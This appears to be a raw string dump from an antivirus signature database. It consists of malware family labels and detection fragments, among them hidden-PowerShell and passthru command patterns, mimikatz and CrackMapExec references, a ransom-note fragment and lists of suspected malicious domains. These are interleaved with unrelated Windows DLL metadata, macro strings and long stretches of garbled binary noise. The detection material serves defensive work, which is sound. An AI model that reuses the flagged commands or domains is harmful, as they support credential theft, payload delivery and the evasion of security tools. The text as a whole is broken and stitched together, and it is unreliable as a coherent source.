temp_authkey_handshake_started !#SCPT:JS/URL.exe.A http:// ` !#SCPT:Ostracbop.C1 ishelldispatch6.namespace(\"7\") ishelldispatch6.namespace(\"7\") !#SCPT:SanboxDetect ifwingettext(\"programmanager\") ifwingettext(\"programmanager\") .getelementsbytagname('head'); .getelementsbytagname('head'); !#SCRIPT:Decompress .compressionmode]::decompress) .compressionmode]::decompress) !#Trojan:VBS/Vmnat1 open(\"get\",\"http open(\"get\",\"http P\",\"false\"); !#SCPT:/Passthru.cmd (\"passthru\")){passthru($cmd); !#SCPT:CookstoneA.AB .mitm_manager !#SCPT:Nemucod.BAC2d //zukergames.com/counter/?a=1 !#SCPT:Sessington.AC \"invalid_plugin_entry_offset\" !#SCPT:VBS/Agent.PA3 !#AllowList:GetPhoto2 portableapps\\jhead\\jhead.exe !#SCPT:AutoItFileOpen =fileopen(@scriptfullpath,0) !#SCPT:CrackMapExec.2 .mimikatz_cmdorargs.injector !#SCPT:Droppedpulse.2 authadmin::getallauthservers !#SCPT:HTML/Phish.S14 history.pushstate({},\"\",\"#\") =iuhxa .split( =jzqsu !#SCPT:PSWindowStyleH powershell-windowstylehidden !#SCPT:VBS/Nemucod.A2 obj.copyfile\"sg4ga\",\"fgdhfs\" !#SCRIPT:DonxRefFrag2 {document.write(\"<iframesrc= !#SCRPT:VBS/Ursnif.A2 .movefile \"+.txzip: !#ALFPER:SCPT:Wizrem.B wemonetize-global-installer !#SCPT:AMSI/EvalPacker eval(function(p,a,c,k,e,r){ !#SCPT:ClnWordsCat1_15 !#SCPT:ClnWordsCat3_11 encryptingyourowncloudfiles !#SCPT:FalsipException classamsipowershelldetector http://3gool.blogspot.com/ http://avcute.blogspot.com/ http://bnpost.blogspot.com/ http://bopdu.blogspot.com/ http://idmnfs.blogspot.com/ ='youhavetopay\"+ +\"btc'; !#SCPT:JS/case.float.A !#Worm:VBS/Jenxcus.F.2 .lnk\").targetpath=\"cmd.exe\" !#BRUTE:JAMSI:FuncN:137 .expandenvironmentstrings( !#SCPT:CVE-2019-1652-AC '\"auth_key\"value=\"(.*?)\">' !#SCPT:PDF.HasPageCount /count crophysi.ru/ fokemale.ru/ gimoguvi.ru/ tortomsk.ru/ !#SCPT:PWS:HTML/Phish_3 yourpracticewillbereviewed !#SCPT:ProxyLogonCltr_4 target=datastore['target'] !#SCPT:Redirector!RIGEK .src=\"http:/ 4X6|,t \tvhXykZ S.d0e v]`pI m6-~f \\\t)? \\\tF5 =k7;tS \\ !)FW \\ !)FW NN6j^ l4$#!D y]tYI )^q^k | 5B- @q-g} YnJQE M;sFh7D\t uLV&7 \\&'^ \\*dw \\,(p s'cXq \\-RF \\-Tk5 \\-Tk5 H*bp& \\.EsA\tA \\.EsA\tA ;w) J \\1gc, \\1gc, +eeT'9R 4Iy9!4 \\4Pe \\5qF ube+_ \\9 ,4 \\9 ,4 ZA`G: 8UFKi \\<Ap \\<LI \\<x0W \\<x0W \\= =p \\= =p \\=TPN \\=TPN xd2]Dd xd2]DdfU8E \\=k% Gu<-T \\A)0 \\ADu\t \\ADu\t hYEHI \\GTf \\J=$ -`nN 8 \\NCB\\r \\NCB\\r G#q0. \\RS$M0 \\RS$M0 k)[}u \\VZRJ} \\VZRJ} R@_xoqs \\WDW EY \\WDW EY \\WzxL \\WzxL \\ZFa-[6 \\ZqH Mw+#~v Ibu*X=> \\[?l \\\\#3 &C(E=~/mh \\_R5 E}i(h \\`yz \\cgv &lj2 [x4W ajD+0 r:(Mk \\pd\t \\rW2 DyJYVW @OZQT `~>g8 \\vQv3 \\vQv3 2=)Uh =!_x4] \\x/tV \\x/tV \\y@, \\z(ic1+j \\z(ic1+j \\~S] \\~lY y.ri\t& R~z<4%t ke-3; y+FB::: Mg4MF aM/nPP '3E<` %9\"bK 5(8@y L~ jz QO2`C 7)>eJ v[BTB5\t pL/63 p<] 4; _ [yC RIBUTE:SIGA:Trojan:MSIL/FakeApp.S001 !#ATTRIBUTE:SIGA:Trojan:MSIL/FakeApp.S001 !#SIGA:TrojanDownloader:MSIL/Genmaldow.SA !#//JAVATTR:JavaObRandom2 !#//JAVATTR:JavaObRandom2 !#SIGATTR:IEDefaultChkOff !#SIGATTR:PhishingDisable !#SIGATTR:Win32/Small.gen !AGroup:RenosKG_regvalues !#SIGATTR:JS:blistjs_api1 !#SIGATTR:JS:blistjs_api2 !#SIGATTR:JS:blistjs_api3 !#SIGATTR:JS:blistjs_api4 !#SIGATTR:JS:blistjs_api6 !#SIGATTR:JS:blistjs_api7 !#//JAVATTR:JavaJustInetAddressgetHostName !#//SIGATTR:CVE-2012-0507.AtRefArrArgument !#SIGATTR:Java:AbstractDocument.readUnlock !#SIGATTR:Java:AccessController.getContext !#SIGATTR:Java:AtomicReferenceArray.length !#SIGATTR:Java:BufferedImage.getColorModel !#SIGATTR:Java:ByteArrayOutputStream.close !#SIGATTR:Java:ByteArrayOutputStream.reset !#SIGATTR:Java:ByteArrayOutputStream.write !#SIGATTR:Java:Collections.synchronizedMap !#SIGATTR:Java:Collections.unmodifiableMap !#SIGATTR:Java:Collections.unmodifiableSet !#SIGATTR:Java:Container.getComponentCount !#SIGATTR:Java:DataOutputStream.writeShort !#SIGATTR:Java:GroupLayout.addContainerGap !#SIGATTR:Java:IIOMetadataNode.appendChild !#SIGATTR:Java:IOException.printStackTrace +$X@? !#SIGATTR:Java:JMenuItem.addActionListener (UK@? !#SIGATTR:Java:Kernel32.CreateRemoteThread !#SIGATTR:Java:Kernel32.WriteProcessMemory !#SIGATTR:Java:LookAndFeel.installProperty !#SIGATTR:Java:ObjectOutputStream.writeInt !#SIGATTR:Java:ParsedSynthStyle.getPainter !#SIGATTR:Java:Raster.createWritableRaster !#SIGATTR:Java:StringTokenizer.countTokens !#SIGATTR:Java:SynthStyle.getGraphicsUtils !#SIGATTR:Java:ZipInputStream.getNextEntry !#SIGATTR:TrojanDownloader:Win32/Badrobo.A !#Sigattr:BrowserModifier:Win32/Diplugem.A !#PUA:Block:PremierOpinion !#Ransom:Win32/Tobfy!LowFi !#SIGATTR:FindWindowRegMon !#SIGATTR:LowFiSkypeWindow !#SIGATTR:UpatreMutexMerak !#SIGATTR:Win32/WhiteSmoke !AGROUP:RunKeyOrCopyItself !AGroup:FakeRean_regvalues !AGroup:GetHDDSerialNumber !#ALF:SIGA:MSIL.FAKEIE.S01 !#PUA:Block:AdvancedPCCare !#TEL:MSIL/Cusax.gen!A!Msg !#NRI:HasRequestResponse.A !#AddsCopyToStartupSelfDel !#//JAVATTR:JavaJustInetAddressgetLocalHost !#SIGATTR:Java:BufferedImage.createGraphics 9[F@@ !#SIGATTR:Java:Class.desiredAssertionStatus !#SIGATTR:Java:Class.getDeclaredConstructor 3VI@@ !#SIGATTR:Java:Collections.unmodifiableList !#SIGATTR:Java:ExpressionHelper.addListener !#SIGATTR:Java:GridBagLayout.setConstraints !#SIGATTR:Java:IIOMetadataNode.setAttribute !#SIGATTR:Java:InetSocketAddress.getAddress !#SIGATTR:Java:JComponent.getClientProperty !#SIGATTR:Java:NamingException.setRootCause !#SIGATTR:Java:ObjectInputStream.readFields !#SIGATTR:Java:ObjectInputStream.readObject !#SIGATTR:Java:ObjectOutputStream.putFields !#SIGATTR:Java:ParamChecks.nullNotPermitted !#SIGATTR:Java:RMIConnectionImpl_Stub.class !#SIGATTR:Java:SecurityManager.checkConnect !#SIGATTR:Java:SynthLookAndFeel.updateStyle !#SIGATTR:Java:SynthStyle.uninstallDefaults !#SIGATTR:Java:TabbedPaneTabPainter.decodeX !#SIGATTR:Java:TabbedPaneTabPainter.decodeY !#SIGATTR:Java:Thread.getContextClassLoader >7=@@ !#SIGATTR:Java:URLConnection.getInputStream P%Y75 !#SIGATTR:Java:WritableRaster.getDataBuffer !#SIGATTR:Java:X509Certificate.getPublicKey !#SIGATTR:Java:_RMIConnectionImpl_Tie.class !#ALF:SIGA:Trojan:MSIL/SuspiciousPingBeh.S6 !#ALF:SIGATTR:Inject_attrib !#BM_SIGATTR:OptimizerElite !#SIGATTR:FindWindowFileMon !#SIGATTR:FindWindowProcMon !#SIGATTR:MpLoadsKernelFile !#SIGATTR:NT_ENUM_VALUE_KEY !#SIGATTR:Tool:Win32/Py2Exe !AGroup:MoveSystemFileToAny !#SIGATTR:JSErrorDocument.A !#SIGATTR:JSWScriptIpconfig !#SIGATTR:CreateRunKey!msil !r`-^i !#//JAVATTR:JavaJustByteArrayInputStreaminit !#SIGATTR:Java:AccessController.doPrivileged !#SIGATTR:Java:Constructor.getParameterTypes !#SIGATTR:Java:CopyOnWriteArrayList.getArray P2[+, !#SIGATTR:Java:GregorianCalendar.internalGet z>e@A !#SIGATTR:Java:HttpURLConnection.setDoOutput !#SIGATTR:Java:Integer.numberOfTrailingZeros !#SIGATTR:Java:JOptionPane.showMessageDialog !#SIGATTR:Java:OptionPanePainter.decodeColor !#SIGATTR:Java:PropertyChangeEvent.getSource !#SIGATTR:Java:RTFGenerator.writeControlWord !#SIGATTR:Java:RoundRectangle2D.setRoundRect !#SIGATTR:Java:StringTokenizer.hasMoreTokens !#SIGATTR:Java:TreePath.getLastPathComponent !#Lowfi:SIGATTR:TrojanClickerClikugInstaller !#SIGATTR:TrojanDownloader:MSIL/Pstinb.M!lnk !#SIGATTR:TrojanDownloader:Win32/Banload.AZQ !#SIGATTR:TrojanDownloader:Win32/Banload.ZET !#SIGATTR:JS:ExpandEnvironmentStrings.Base64 !#ATTRIBUTE:SIGA:MISL:PossibleKillProcess:S1 !#SIGATTR:Java:B64Decoding.A !#ALFPER:SIGATTR:Win32/Chira !#Lowfi:SIGATTR:Win32/Bitral !#SIGATTR:DownloadAndExecute !#SIGATTR:Download_exec_nssd !#SIGATTR:Env_XtratWriteFile !#SIGATTR:Env_XtratWriteFile !#SIGATTR:FirewallBypassList !#SIGATTR:FirewallBypassList !#SIGATTR:PWS:Win32/Colste.A !#SIGATTR:PWS:Win32/Colste.A !#SIGATTR:PossibleCopaliDrop !#SIGATTR:Reg_DelProxyServer 0;BYJ !#SIGATTR:Reg_SetProxyEnable !#SIGATTR:Virus:Win32/Ceel.A !#SIGATTR:Virus:Win32/Ceel.A*0!0 !#SIGATTR:Worm:Win32/Kolab.B !#SIGATTR:Worm:Win32/Kolab.B*0 0 !#Trojan:Win32/Foosace.H!dha !AGroup:Banload_exe_location !AGroup:MSIL/Banload.AK!path !#NRI:Dirtvantisetu.20210830 !#NRI:Dirtvantizeni.20210830 !#NRI:Dirtvantufiet.20210830 !#Trojan:Win32/Broban.A!lofi !#LowfiVBox2 !DeepEmuStop !#//SIGATTR:CVE-2013-0422.invokeWithArguments S=<@B !#SIGATTR:Java:CertificateFactory.getInstance !#SIGATTR:Java:CoderResult.malformedForLength !#SIGATTR:Java:EventListenerList.getListeners !#SIGATTR:Java:GraphicsEnvironment.isHeadless b 1@B !#SIGATTR:Java:JarInputStream.getNextJarEntry >Co@B !#SIGATTR:Java:MethodHandles.findStaticSetter !#SIGATTR:Java:NoClassDefFoundError.initCause !#SIGATTR:Java:ObjectOutputStream.writeFields !#SIGATTR:Java:ObjectOutputStream.writeObject !#SIGATTR:Java:ProtectionDomain.getCodeSource !#SIGATTR:Java:SliderThumbPainter.decodeColor !#SIGATTR:Java:StackTraceElement.getClassName P(*~{ !AGroup:CVE-2012-0422.PayloadNewClassInstance !#SIGATTR:BrowserModifier:Win32/Neobar.A!json !#TEL:SIGATTR:Tool:Win32/CmdNetFwStOpModDis.A !#Lowfi:SIGATTR:Win32/Wdfload !#SIGATTR:Adware:Win32/EoRezo !#SIGATTR:NativeDynamicImport !#SIGATTR:NativeDynamicImportJ0\t !#SIGATTR:Program:Win32/KNCTR !#SIGATTR:Reg_ActiveSetupASEP !#SIGATTR:Run_BailOnDriveType !#SIGATTR:TrojanSefnit_packer !AGroup:ALFPER:BamvledsA_Urls !AGroup:Ldpinch_B_FirewallWND !#TEL:Exploit:JS/Nelyde.B!dha !#ALF:Ransom:MSIL/Penta.B!MTB !#//SIGATTR:Java.doPrivileged !#HttpRequest !#//SIGATTR:CVE-2013-0422.getMBeanInstantiator !#SIGATTR:Java:AudioFormat.getSampleSizeInBits 3NPN3 P3NPN3@C !#SIGATTR:Java:BasicFavoritesNavigatorUI.debug !#SIGATTR:Java:BorderFactory.createEmptyBorder !#SIGATTR:Java:ClassLoader.getResourceAsStream 'Ix@C !#SIGATTR:Java:CoderResult.unmappableForLength !#SIGATTR:Java:ColorModel.isAlphaPremultiplied !#SIGATTR:Java:ExpressionHelper.removeListener !#SIGATTR:Java:IllegalAccessException.toString !#SIGATTR:Java:KeyboardFocusManager.getCurrent !#SIGATTR:Java:OptionPanePainter.decodeAnchorX !#SIGATTR:Java:OptionPanePainter.decodeAnchorY !#SIGATTR:Java:PropertyChangeEvent.getNewValue !#SIGATTR:Java:PropertyChangeEvent.getOldValue !#SIGATTR:Java:SecurityManager.checkPermission !#SIGATTR:Java:StackTraceElement.getMethodName !#SIGATTR:Java:User32.GetWindowThreadProcessId P+dJ& !#SIGATTR:Java:X509Certificate.getSerialNumber !#ALF:SIGATTR:PossibleMeterpreter_http4444port !#TEL:Trojan:Win32/LowFiContextRundllAppdata.A !#ALF:Trojan:Win32/Qbot.ZX!MTB !#SIGATTR:CeeInject_MyAppCheck !#SIGATTR:DisableGoogleUpdate1 !#SIGATTR:DisableGoogleUpdate2 !#SIGATTR:DisableGoogleUpdate3 !#SIGATTR:FindFirstFileAppData !#SIGATTR:GetSystemTimeBailout !#SIGATTR:Program:Win32/Kometa !#SIGATTR:Reg_SetManualProxies 0JM+D !#SIGATTR:Virus:Win32/Virut.BN !#SIGATTR:Virus:Win32/Virut.BN $0 !#SLFPER:EnumWindowHandleCount !#ALF:Ransom:MSIL/Fancy.MK!MTB !#ALF:SIGA:MSIL/WeirdNameApp.A !#ALF:SIGA:MSIL/WeirdNameApp.B !#ALF:SIGA:MSIL/WeirdNameApp.C !#ALF:SIGA:MSIL/WeirdNameApp.D !#ALF:SIGA:MSIL/WeirdNameApp.E !#ALF:SIGA:MSIL/WeirdNameApp.F !#ALF:SIGA:MSIL/WeirdNameApp.G !#ALF:SIGA:MSIL/WeirdNameApp.H !#ALF:SIGA:MSIL/WeirdNameApp.I !#ALF:SIGA:MSIL/WeirdNameApp.J !#ALF:SIGA:MSIL/WeirdNameApp.K !#ALF:SIGA:MSIL/WeirdNameApp.L !#ALF:SIGA:MSIL/WeirdNameApp.M !#ALF:SIGA:MSIL/WeirdNameApp.N !#ALF:SIGA:MSIL/WeirdNameApp.O !#ALF:SIGA:MSIL/WeirdNameApp.P !#ALF:SIGA:MSIL/WeirdNameApp.Q !#ALF:SIGA:MSIL/WeirdNameApp.R !#ALF:SIGA:MSIL/WeirdNameApp.S !#ALF:SIGA:MSIL/WeirdNameApp.T !#ALF:SIGA:MSIL/WeirdNameApp.U !#ALF:SIGA:MSIL/WeirdNameApp.V !#ALF:SIGA:MSIL/WeirdNameApp.W !#ALF:SIGA:MSIL/WeirdNameApp.X !#ALF:SIGA:MSIL/WeirdNameApp.Y !#ALF:SIGA:MSIL/WeirdNameApp.Z !#ATTRIBUTE:SIGA:MISL lerated-video-decode >--disable-accelerated-2d-canvas 4--disable-gl-multisampling &/prefetch:673131151 (forcecompositingmode !#ALF:AMSI3:ML:Vba:70 !#ALF:AMSI3:ML:Vba:80 !#ALF:AMSI3:ML:Vba:90 !#ALF:AMSI3:ML:Vba:95 !#ALF:AMSI3:ML:Vba:98 !#ALF:AMSI3:ML:Vba:99 !#PowerShell/PsGetClipboard.A !#//BM_OFFICE_FILE_CONTAINER !#Win32/LnkFileWithCscript.A !#Win32/LnkFileWithCscript.A !#Win32/LnkFileWithWscript.A !#Win32/LnkFileWithWscript.A !#ALF:AMSI3:ML:Jamsi:90 ,!#ALF:AMSI3:ML:Jamsi:90 !#ALF:AMSI3:ML:Jamsi:95 ,!#ALF:AMSI3:ML:Jamsi:95 !#ALF:AMSI3:ML:Jamsi:98 ,!#ALF:AMSI3:ML:Jamsi:98 !#ALF:AMSI3:ML:Jamsi:99 ,!#ALF:AMSI3:ML:Jamsi:99 !#ALF:Trojan:UEFI/Lotoob.B 5!#ALF:Trojan:UEFI/Lotoob.B !#TEL:AGGR:ExpDatObjLnch :!#TEL:AGGR:ExpDatObjLnch !#TEL:AGGR:ContextualPersistDropNewExePe.gen!A Y.'!#TEL:AGGR:ContextualPersistDropNewExePe.gen!A !#ALF:Win32/VBScriptWithWmiObject.A ]#6!#ALF:Win32/VBScriptWithWmiObject.A !#SLF:JarSingleFileInsideArchive.B!7zip g'<!#SLF:JarSingleFileInsideArchive.B!7zip !#SLF:LnkSingleFileInsideArchive.B!7zip g'<!#SLF:LnkSingleFileInsideArchive.B!7zip !#SLF:JarSingleFileInsideArchive.B!rar h&>!#SLF:JarSingleFileInsideArchive.B!rar !#SLF:JarSingleFileInsideArchive.B!zip h&>!#SLF:JarSingleFileInsideArchive.B!zip !#SLF:LnkSingleFileInsideArchive.B!rar h&>!#SLF:LnkSingleFileInsideArchive.B!rar !#SLF:LnkSingleFileInsideArchive.B!zip h&>!#SLF:LnkSingleFileInsideArchive.B!zip !#ALF:Win32/OfficeWithWmiObject.A i!D!#ALF:Win32/OfficeWithWmiObject.A !#SLF:Context/NonPeFileInStartUpFolder.A!js i+:!#SLF:Context/NonPeFileInStartUpFolder.A!js !#SLF:Context/NonPeFileInStartUpFolder.A!vb i+:!#SLF:Context/NonPeFileInStartUpFolder.A!vb !#SLF:Context/JarFileDownloaded.A!downloads k+<!#SLF:Context/JarFileDownloaded.A!downloads !#SLF:Context/NonPeFileInStartUpFolder.A!hta k,;!#SLF:Context/NonPeFileInStartUpFolder.A!hta !#SLF:Context/NonPeFileInStartUpFolder.A!jar k,;!#SLF:Context/NonPeFileInStartUpFolder.A!jar !#ALF:VirTool:PowerShell/MpTamperDisableFeatureWd.C p39!#ALF:VirTool:PowerShell/MpTamperDisableFeatureWd.C !#ALF:Win32/OfficeWithWmiObject.B s!N!#ALF:Win32/OfficeWithWmiObject.B !#SLF:JarSingleFileInsideArchive.A!7zip w'L!#SLF:JarSingleFileInsideArchive.A!7zip !#SLF:LnkSingleFileInsideArchive.A!7zip w'L!#SLF:LnkSingleFileInsideArchive.A!7zip !#ALF:Trojan:O97M/HiddenXlmInOfficeOXML.A w)J!#ALF:Trojan:O97M/HiddenXlmInOfficeOXML.A !#SLF:JarSingleFileInsideArchive.A!rar x&N!#SLF:JarSingleFileInsideArchive.A!rar !#SLF:JarSingleFileInsideArchive.A!zip x&N!#SLF:JarSingleFileInsideArchive.A!zip !#SLF:LnkSingleFileInsideArchive.A!rar x&N!#SLF:LnkSingleFileInsideArchive.A!rar !#SLF:LnkSingleFileInsideArchive.A!zip x&N!#SLF:LnkSingleFileInsideArchive.A!zip !#ALF:Trojan:O97M/VeryXlmInOfficeOXML.A y'N!#ALF:Trojan:O97M/VeryXlmInOfficeOXML.A !#ALF:Trojan:O97M/EncDoc.V1 \\!#ALF:Trojan:O97M/EncDoc.V1 !#ALF:Trojan:O97M/EncDoc.V2 \\!#ALF:Trojan:O97M/EncDoc.V2 !#ALF:Trojan:O97M/EncDoc.NV1 ]!#ALF:Trojan:O97M/EncDoc.NV1 !#ALF:Trojan:O97M/EncDoc.V3 `!#ALF:Trojan:O97M/EncDoc.V3 !#SLF:Context/FileInADSEdge.A _!#SLF:Context/FileInADSEdge.A !#SLF:Context/FileInADSDesktop.A `!#SLF:Context/FileInADSDesktop.A !#SLF:Context/OfficeObjectFileAttachment.B!js -S!#SLF:Context/OfficeObjectFileAttachment.B!js !#SLF:Context/FileInADSDownload.A !a!#SLF:Context/FileInADSDownload.A !#SLF:Context/FileInADSTempFolder.A #_!#SLF:Context/FileInADSTempFolder.A !#SLF:Context/OfficeObjectFileAttachment.B!bat .T!#SLF:Context/OfficeObjectFileAttachment.B!bat !#SLF:Context/OfficeObjectFileAttachment.B!cmd .T!#SLF:Context/OfficeObjectFileAttachment.B!cmd !#SLF:Context/OfficeObjectFileAttachment.B!com .T!#SLF:Context/OfficeObjectFileAttachment.B!com !#SLF:Context/OfficeObjectFileAttachment.B!exe .T!#SLF:Context/OfficeObjectFileAttachment.B!exe !#SLF:Context/OfficeObjectFileAttachment.B!hta .T!#SLF:Context/OfficeObjectFileAttachment.B!hta !#SLF:Context/OfficeObjectFileAttachment.B!jar .T!#SLF:Context/OfficeObjectFileAttachment.B!jar !#SLF:Context/OfficeObjectFileAttachment.B!lnk .T!#SLF:Context/OfficeObjectFileAttachment.B!lnk !#SLF:Context/OfficeObjectFileAttachment.B!pif .T!#SLF:Context/OfficeObjectFileAttachment.B!pif !#SLF:Context/OfficeObjectFileAttachment.B!ps1 .T!#SLF:Context/OfficeObjectFileAttachment.B!ps1 !#SLF:Context/OfficeObjectFileAttachment.B!scr .T!#SLF:Context/OfficeObjectFileAttachment.B!scr !#SLF:Context/OfficeObjectFileAttachment.B!vbs .T!#SLF:Context/OfficeObjectFileAttachment.B!vbs !#SLF:Context/FileInADSEdge.B i!#SLF:Context/FileInADSEdge.B !#ALF:VirTool:PowerShell/MpTamperDisableFeatureWd.B 3Z!#ALF:VirTool:PowerShell/MpTamperDisableFeatureWd.B !#ALF:CMD:Trojan:Win32/TrapsDisableAV %j!#ALF:CMD:Trojan:Win32/TrapsDisableAV !#ALF:Trojan:O97M/EncDoc.NV2 y!#ALF:Trojan:O97M/EncDoc.NV2 !#SLF:Win32/CVE-2019-1367.A!payload #r!#SLF:Win32/CVE-2019-1367.A!payload !#ALF:Trojan:O97M/HiddenXlm.A !#ALF:Trojan:O97M/HiddenXlm.C !#ALF:Trojan:O97M/XlmInOfficeOXML.C !#ALF:Trojan:O97M/ContainsXlm.A !#ALF:Trojan:O97M/HiddenXlm.B !#TEL:AGGR:ZipSlip7z !#TEL:AGGR:ZipSlipJar !#TEL:AGGR:ZipSlipRar !#ALF:Trojan:O97M/EncDoc.F1 !#ALF:Trojan:O97M/EncDoc.F2 !#ALF:CMD:Trojan:Win32/TrapsDoubleExtension _#LOWFI:Lua:ContextualDropFileIE _#LOWFI:Lua:ContextualDropFileIEU( z_#LOWFI:Lua:ContextualDropFileOpera z_#LOWFI:Lua:ContextualDropFileOperaU)W _#LOWFI:Lua:ContextualDropFileChrome _#LOWFI:Lua:ContextualDropFileChromeU* _#LOWFI:Lua:ContextualDropFileFirefox _#LOWFI:Lua:ContextualDropFileFirefoxU.= X_#LOWFI:Lua:ContextualDropFileSkypeExtBin X_#LOWFI:Lua:ContextualDropFileSkypeExtBinU1 _#LOWFI:Lua:ContextualDropFileSkypeExtOffice _#LOWFI:Lua:ContextualDropFileSkypeExtOfficeU2B $_#LOWFI:Lua:ContextualDropFileSkypeExtArchive $_#LOWFI:Lua:ContextualDropFileSkypeExtArchiveU2 _#LOWFI:Lua:ContextualDropFileSkypeDefaultBin _#LOWFI:Lua:ContextualDropFileSkypeDefaultBinU5i ~_#LOWFI:Lua:ContextualDropFileSkypeDefaultOffice ~_#LOWFI:Lua:ContextualDropFileSkypeDefaultOfficeU6] _#LOWFI:Lua:ContextualDropFileSkypeDefaultArchive _#LOWFI:Lua:ContextualDropFileSkypeDefaultArchivez 25b3513fc5f0 OfficeLaunchesWmi 25b3663b0782 25b39c330726 69b3b5a9042a sEF@ !#TEL:MacroLibKernel32 ByVal Mldg = \"Fehler # \" & Str(Err.Number) & \" wurde ausgel If Selection.Type = wdSelectionIP Then 'Insertion point... means it's not selected MsgBox (\"Word could not communicate with Zotero. Please ensure Zotero is running and try again BULKEXPORTINDEX = \"XUM\" 63d74a34af5f W63d74a34af5f 65d759637238 W65d759637238 69d79d049062 W69d79d049062 6bd74f5f9e2c W6bd74f5f9e2c 6bd75c1bd5e2 W6bd75c1bd5e2 d1d77950b1dc Wd1d77950b1dc e3d77e0a105a We3d77e0a105a MpInternal_Lua:ThrottleAttribute.5000 &MpInternal_Lua:ThrottleAttribute.5000 6fb347ed3ea1 d4f940ab-401b-4efc-aadc-ad5f3c50688a %d4f940ab-401b-4efc-aadc-ad5f3c50688a 75b3804b448b 51b3453d88af 51b3453d88afIncludesBMLuaLib 51b34af10a7e 51b34af10a7eIncludesBMLuaLib 45b3f8eb1f25 95b3d5503600 !#SLF:Context/Kovter.B!lnk !#SLF:Context/Kovter.B!lnkObMpAttributes !#SLF:Context/Kovter.C !#SLF:Context/Kovter.CObMpAttributes opyright OriginalFilenamesyncengj% $ @@#g.a RSDSf0+ dbmsrpcn.pdb dbmsrpcn.pdb3 DBMSRPCN.DLL ConnectionClose ConnectionObjectSize DBMSRPCN.DLLConnectionCloseConnectionObjectSize FileDescriptionWindows dbmsrpcn Library InternalNamedbmsrpcn OriginalFilenamedbmsrpcnj% $ @@$g.a API-MS-WIN-CORE-LOCALIZATION-L1-1-0.DLL API-MS-WIN-CORE-LOCALIZATION-L1-1-0.DLLRSDS api-ms-win-core-localization-l1-1-0.pdb FileDescriptionWindows api-ms-win-core-localization-l1-1-0 Library FileVersion10.0.10126.0 (GitEnlistment(amopslocal).210831-1009)h$ InternalNameapi-ms-win-core-localization-l1-1-0 Microsoft Corporation. All rights reserved.p$ OriginalFilenameapi-ms-win-core-localization-l1-1-0j% $ @@(g.a api-ms-win-core-io-l1-1-0.dll CreateIoCompletionPort kernel32.CreateIoCompletionPort kernel32.DeviceIoControl GetOverlappedResult kernel32.GetOverlappedResult GetQueuedCompletionStatus kernel32.GetQueuedCompletionStatus PostQueuedCompletionStatus kernel32.PostQueuedCompletionStatus RSDSsNdD api-ms-win-core-io-l1-1-0.dllCreateIoCompletionPortkernel32.CreateIoCompletionPortDeviceIoControlkernel32.DeviceIoControlGetOverlappedResultkernel32.GetOverlappedResultGetQueuedCompletionStatuskernel32.GetQueuedCompletionStatusPostQueuedCompletionStatuskernel32.PostQueuedCompletionStatusRSDSsNdD api-ms-win-core-io-l1-1-0.pdb StringFileInfoF FileDescriptionWindows api-ms-win-core-io-l1-1-0 Library FileVersion10.0.10126.0 (GitEnlistment(amopslocal).210831-1009)T InternalNameapi-ms-win-core-io-l1-1-0 Microsoft Corporation. All rights reserved.\\ OriginalFilenameapi-ms-win-core-io-l1-1-0j% $ @@/e.a dpnhupnp.pdb dpnhupnp.pdb3 DPNHUPNP.DLL DPNHUPNP.DLLDllCanUnloadNowDllRegisterServerDllUnregisterServerDllGetClassObject FileDescriptionWindows dpnhupnp Library InternalNamedpnhupnp OriginalFilenamedpnhupnpj% $ .text{ @@0e.a iskCopyRunDllWcom:asm.v1\"yToken=\"6595b64 FAT12 Disk I/O any keyDOS SY$B#DB%1$C3DCDCDDEdDGEQ$ESDE ONFIG ETRAMD SPI4DOS TCDROM SPI2DOS_XcptFiltersetusermatheadjust_fdiv%20Windows%20VB RSDSt SPI2DOS_XcptFiltersetusermatheadjust_fdiv%20Windows%20VBRSDSt diskcopy.pdb diskcopy.pdb3 lc.aL DISKCOPY.DLL DISKCOPY.DLLDllCanUnloadNowDllGetClassObject FileDescriptionWindows diskcopy Library InternalNamediskcopy OriginalFilenamediskcopyj% 6e788cf075ae 6e78e70d6c96 6f782641d577 6f7832360fb5 6f78b7005b71 707850c4e973 7078746cc95a 70788727773b 7178c6205f37 727832380ad4 727865a93c30 72787eabf4e6 7278eaf66663 73781163b4f5 7378c62df341 7378f372dedd 747819b1ef73 747834fbe85d 7478831c20e3 7478b42bc5e2 75782cd97c10 757887b62bb8 7578d17e2e36 7578fb091115 767870f2c92c 767871dba105 7678d5c4f6be 7678f261e805 7778ddcc98b4 7878691ccfa3 7878b2bca476 7878fd640a02 7978614a07e0 79787df2c0b1 7a78c552e1c1 7b78dd1a5848 7b78e6f52dbd 7c7818b044be 7d784db15404 7d78ff016654 7e783c4816d7 7e78a253f183 80610917e292 8078d802e4de 8178f1fccf20 827862845ae6 8278bd91a6fb !#SLF:AGGR:ExeFileDropBySystemProc!l_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!l_root !#SLF:AGGR:ExeFileDropBySystemProc!m_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!m_root !#SLF:AGGR:ExeFileDropBySystemProc!n_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!n_root !#SLF:AGGR:ExeFileDropBySystemProc!o_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!o_root !#SLF:AGGR:ExeFileDropBySystemProc!p_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!p_root !#SLF:AGGR:ExeFileDropBySystemProc!q_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!q_root !#SLF:AGGR:ExeFileDropBySystemProc!r_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!r_root !#SLF:AGGR:ExeFileDropBySystemProc!s_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!s_root !#SLF:AGGR:ExeFileDropBySystemProc!sysdir s)F!#SLF:AGGR:ExeFileDropBySystemProc!sysdir !#SLF:AGGR:ExeFileDropBySystemProc!t_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!t_root !#SLF:AGGR:ExeFileDropBySystemProc!u_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!u_root !#SLF:AGGR:ExeFileDropBySystemProc!v_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!v_root !#SLF:AGGR:ExeFileDropBySystemProc!w_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!w_root !#SLF:AGGR:ExeFileDropBySystemProc!windir s)F!#SLF:AGGR:ExeFileDropBySystemProc!windir !#SLF:AGGR:ExeFileDropBySystemProc!x_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!x_root !#SLF:AGGR:ExeFileDropBySystemProc!y_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!y_root 